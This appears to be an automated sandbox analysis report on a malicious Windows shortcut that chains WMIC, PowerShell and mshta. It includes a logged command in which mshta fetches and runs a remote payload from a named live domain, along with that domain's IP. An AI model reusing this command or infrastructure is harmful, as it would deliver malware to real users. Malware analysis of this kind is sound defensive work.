Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: InExYnlM0N.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1489Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1217Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4568Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.3400840059.0000028E293BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3404233739.00000239E9450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW000002962B0F8D80-17eed29b5
Source: svchost.exe, 00000007.00000002.3401991204.00000239E3E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookieJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581247 Sample: InExYnlM0N.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 80 24 dimitricostruzioni.ch 2->24 30 Windows shortcut file (LNK) starts blacklisted processes 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 Windows shortcut file (LNK) contains suspicious command line arguments 2->34 36 3 other signatures 2->36 8 WMIC.exe 1 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 38 Contains functionality to create processes via WMI 8->38 40 Creates processes via WMI 8->40 14 powershell.exe 7 8->14         started        17 conhost.exe 1 8->17         started        28 127.0.0.1 unknown unknown 11->28 signatures6 process7 signatures8 42 Windows shortcut file (LNK) starts blacklisted processes 14->42 19 mshta.exe 14 14->19         started        22 conhost.exe 14->22         started        process9 dnsIp10 26 dimitricostruzioni.ch 62.182.21.105, 443, 49709 SUB6GB United Kingdom 19->26

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
InExYnlM0N.lnk18%ReversingLabsWin32.Trojan.Cross
InExYnlM0N.lnk34%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://dimitricostruzioni.ch/0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieTA%?0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookiei)0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$global:?0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieK0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookie0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieOP0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieramFiles(x0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieC:0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookiey.IE50%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieh10%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieA0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieFriendlyName=0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookie~0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/a0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookieH0%Avira URL Cloudsafe
https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$P0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
dimitricostruzioni.ch
62.182.21.105
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://dimitricostruzioni.ch/new/files/Documents/vanillecookietrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://dimitricostruzioni.ch/new/files/Documents/vanillecookieKmshta.exe, 00000005.00000002.3400840059.0000028E292F0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dimitricostruzioni.ch/new/files/Documents/vanillecookieOPmshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dimitricostruzioni.ch/new/files/Documents/vanillecookieTA%?mshta.exe, 00000005.00000002.3400735199.0000028E292C0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dimitricostruzioni.ch/new/files/Documents/vanillecookiei)WMIC.exe, 00000000.00000002.2151951037.00000146CBD27000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.2150462678.00000146CBD22000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
      high
      https://dimitricostruzioni.ch/new/files/Documents/vanillecookieC:mshta.exe, 00000005.00000002.3400840059.0000028E292F0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dimitricostruzioni.ch/new/files/Documents/vanillecookieramFiles(xWMIC.exe, 00000000.00000002.2152098610.00000146CBEF0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$global:?powershell.exefalse
      • Avira URL Cloud: safe
      unknown
      https://dimitricostruzioni.ch/mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://dimitricostruzioni.ch/new/files/Documents/vanillecookiey.IE5mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2215526716.00000239E9210000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
        high
        http://crl.ver)svchost.exe, 00000007.00000002.3404046761.00000239E9409000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookieFriendlyName=WMIC.exe, 00000000.00000003.2150544769.00000146CBD4F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.2150585001.00000146CBD56000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.2152025858.00000146CBD57000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookie~mshta.exe, 00000005.00000002.3403831920.000002962BE91000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookieh1mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookieAmshta.exe, 00000005.00000002.3401942251.000002962B0D0000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/amshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookieHmshta.exe, 00000005.00000002.3401232716.0000028E2ABC0000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$Pmshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          62.182.21.105
          dimitricostruzioni.chUnited Kingdom
          200083SUB6GBtrue
          IP
          127.0.0.1
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1581247
          Start date and time:2024-12-27 09:03:57 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 44s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:10
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:InExYnlM0N.lnk
          renamed because original name is a hash value
          Original Sample Name:55e5e8544221031af4684ea083f25a28.lnk
          Detection:MAL
          Classification:mal80.evad.winLNK@7/8@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .lnk
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          03:04:51API Interceptor1x Sleep call for process: WMIC.exe modified
          03:04:57API Interceptor2x Sleep call for process: svchost.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          62.182.21.105Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
            KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              dimitricostruzioni.chRechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
              • 62.182.21.105
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              SUB6GBRechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
              • 62.182.21.105
              KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
              • 62.182.21.105
              Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
              • 62.182.21.92
              http://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
              • 62.182.22.52
              https://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
              • 62.182.22.52
              https://cmax.co.uk/qw.PDFGet hashmaliciousUnknownBrowse
              • 62.182.22.52
              WSGZf4NplR.elfGet hashmaliciousMiraiBrowse
